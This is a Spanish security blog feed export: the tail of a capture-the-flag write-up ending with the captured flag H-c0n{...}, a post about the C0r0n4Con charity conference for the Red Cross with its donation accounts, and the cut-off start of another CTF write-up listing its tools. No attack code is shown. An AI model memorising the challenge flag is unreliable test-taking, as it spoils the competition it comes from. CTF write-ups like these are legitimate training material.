Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 4096 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Jan </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 9 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">11:14 .ssh</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwxr-xr-x</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 2 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 4096 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Jan </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 9 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">11:26 backup</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-------</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 1 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 40 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Jan </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 9 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">04:09 local.txt</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal@h-c0n_prequal:~$ cat local.txt </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">H-c0n{3ab7568bdae26ac11f6b9e14cad546f9}</span></p></td></tr></tbody></table></div><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Y conseguimos tener acceso a local.txt ></span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">H-c0n{3ab7568bdae26ac11f6b9e14cad546f9}</span></p><br /><br /></span>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-60256081878891816142020-04-05T20:21:00.001+02:002020-04-05T20:24:27.347+02:00C0r0n4Con: El congreso de Cyberseguridad que recauda fondos para luchar contra el Covid19.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8tm0jDyIut0wFgeJWPlUtyHU1oWzCzSFmITnUKdedpUY-3RqqmCLLXvW9zhpJDu4G6RY_Sy5OBzccoRv8ATIIejiv0diLF3BzgNyUozQHg9ybj7tpNUh1mN_OlRxuG1ic_KPCYx3ayB6X/s1600/bannerCoronaCon.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1342" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8tm0jDyIut0wFgeJWPlUtyHU1oWzCzSFmITnUKdedpUY-3RqqmCLLXvW9zhpJDu4G6RY_Sy5OBzccoRv8ATIIejiv0diLF3BzgNyUozQHg9ybj7tpNUh1mN_OlRxuG1ic_KPCYx3ayB6X/s640/bannerCoronaCon.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Desde HoneySEC estamos apoyando activamente la iniciativa de C0r0n4Con, </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">un evento internacional que pretende recaudar fondos para los proyectos de </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cruz Roja Española que desarrollan contra el Covid19.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"></span></div>
<a name='more'></a><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "arial"; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;">Con el objetivo de recaudar fondos para Cruz Roja Española nace </span><br />
<span style="font-family: "arial"; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;">C0r0n4Con, </span><span style="font-family: "arial"; font-size: 14pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">evento online que agrupará a más de 100 profesionales</span><span style="font-family: "arial"; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"> y</span><br />
<span style="font-family: "arial"; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"> entusiastas de la seguridad informática y que se celebrará desde el 9 de abril </span><br />
<span style="font-family: "arial"; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;">hasta el 12 del mismo mes.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<b id="docs-internal-guid-1395c8cc-7fff-0c98-4432-005c2f187409" style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Se trata de un </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">evento internacional que contará con la colaboración de </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">hackers españoles, colombianos, argentinos, brasileños y chilenos</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">, </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">que ofreciendo charlas buscan recaudar fondos para luchar contra la epidemia </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">que asola nuestros países y que se está cebando con colectivos desfavorecidos</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> que en estos momentos necesitas ser ayudados por instituciones como Cruz </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Roja.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">El evento se retransmitirá a través de internet, desplegando </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">más de 3000 horas</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> de contenidos y tendrá acceso gratuito</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> para todas aquellas personas que </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">quieran asistir a las charlas y talleres. Se animará a que los asistentes donen </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">fondos, que serán recogidos directamente por los medios dispuestos por Cruz </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Roja y mediante los cuales se pueda ampliar el proyecto RESPONDE frente al </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Covid-19 que está desarrollando la entidad.</span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Proyecto Plan Cruz Roja RESPONDE frente al COVID-19</span></h2>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Desde el comienzo de esta crisis Cruz Roja aseguró el mantenimiento de sus </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programas esenciales e intensificó su actividad con las personas más vulnerable</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">s ante el COVID-19. </span></div>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">En el marco del Estado de Alarma Nacional, lanzando el Plan Cruz Roja RESPONDE</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> frente al COVID-19 para las personas en situación de vulnerabilidad y población </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general, en coordinación con todas las administraciones públicas. Un plan </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">concreto de actuación y respuesta para los próximos dos meses y que pretende </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">alcanzar a más de 1,350.000 personas con un presupuesto estimado de </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">11,000.000 €, al que podrá sumarse a todo aquel que quiera contribuir.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">El plan pretende movilizar a más de 40.000 personas voluntarias que materializan</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> las respuestas previstas en todo el Estado a través de sus más de 1.400 puntos </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">de atención.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Casi un millón de personas recibirán atención y acompañamiento telefónico, </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">25.000 familias recibirán bienes básicos, 16.000 personas serán apoyadas en </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">materia de empleo y 3.000 personas sin hogar tendrán un lugar para dormir.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Captación de fondos</span></h2>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Se puede colaborar con el proyecto utilizando las siguientes páginas web:</span><br />
<br />
<ul>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">https://c0r0n4con.com/ (Sección Colabora)</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">https://www.cruzroja.es/webCre/donativos/donativos.php </span></li>
</ul>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">También realizando un ingreso en las siguientes cuentas bancarias dispuestas </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">por Cruz Roja España:</span><br />
<span style="font-family: arial; font-size: 14pt; white-space: pre;"><br /></span>
<br />
<ul>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">BBVA: ES92 0182 2370 4600 1002 2227</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">Caixabank: ES28 2100 0600 8502 0196 0066</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">Bankia: ES77 2038 1063 6560 0061 9773</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">Sabadell: ES31 0081 5232 2800 0108 4716</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">Bankinter: ES75 0128 0010 9701 0012 1395</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">Triodos: ES86 0198 0500 8020 2205 3421</span></li>
<li><span style="font-family: arial; font-size: 14pt; white-space: pre;">Banco Cooperativo: ES18 1491 0001 2130 0008 9598</span></li>
</ul>
</div>
Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-4058503680530883752020-02-21T06:45:00.002+01:002020-02-21T06:48:02.220+01:00Hc0n2020prequals - Challenges - samurai - 1v4n<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;"><img height="341" src="https://lh6.googleusercontent.com/4_0aeub2rL_peddj8z8OoBhg3E72_ndbwde1gUBu7675MgM27nYqCWg9mmu2xwzmsv7tsf1JdOtDOD3HwDGoW6hS6cFDZ-ge7xGzYHExPqurNuUEse2PPdnjKsSLpYqTUrg8wHlC" style="font-style: normal; font-weight: 400; margin-left: 0px; margin-top: 0px; text-align: center;" width="600" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Descripción</span></div>
<b id="docs-internal-guid-108650ca-7fff-bfaa-5827-119fbd9b2e2c" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Nombre:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> samurai (</span><a href="https://ctf.h-c0n.com/challenges#Samurai" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://ctf.h-c0n.com/challenges#Samurai</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> )</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Fecha de liberación:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 11 - 17 de enero 2020</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Autor: </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Hackplayers (</span><a href="https://twitter.com/Hackplayers" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://twitter.com/Hackplayers</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ) // h-c0n (</span><a href="https://twitter.com/h_c0n" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://twitter.com/h_c0n</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ) // #h-c0n (</span><a href="https://twitter.com/hashtag/hc0n2020" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://twitter.com/hashtag/hc0n2020</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">) </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Dificultad:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Medio</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<a name='more'></a><b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Objetivo</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Formato de flag: H-c0n{" + MD5 + "}</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 341px; overflow: hidden; width: 600px;"><img height="341" src="https://lh6.googleusercontent.com/4_0aeub2rL_peddj8z8OoBhg3E72_ndbwde1gUBu7675MgM27nYqCWg9mmu2xwzmsv7tsf1JdOtDOD3HwDGoW6hS6cFDZ-ge7xGzYHExPqurNuUEse2PPdnjKsSLpYqTUrg8wHlC" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Herramientas utilizadas</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Firefox 68.2.0esr </span><a href="https://www.mozilla.org/en-US/firefox/68.2.0/releasenotes/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.mozilla.org/en-US/firefox/68.2.0/releasenotes/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GNU strings (GNU Binutils for Debian) 2.33.90.20200122</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Binwalk v2.2.0 </span><a href="https://github.com/ReFirmLabs/binwalk" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/ReFirmLabs/binwalk</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
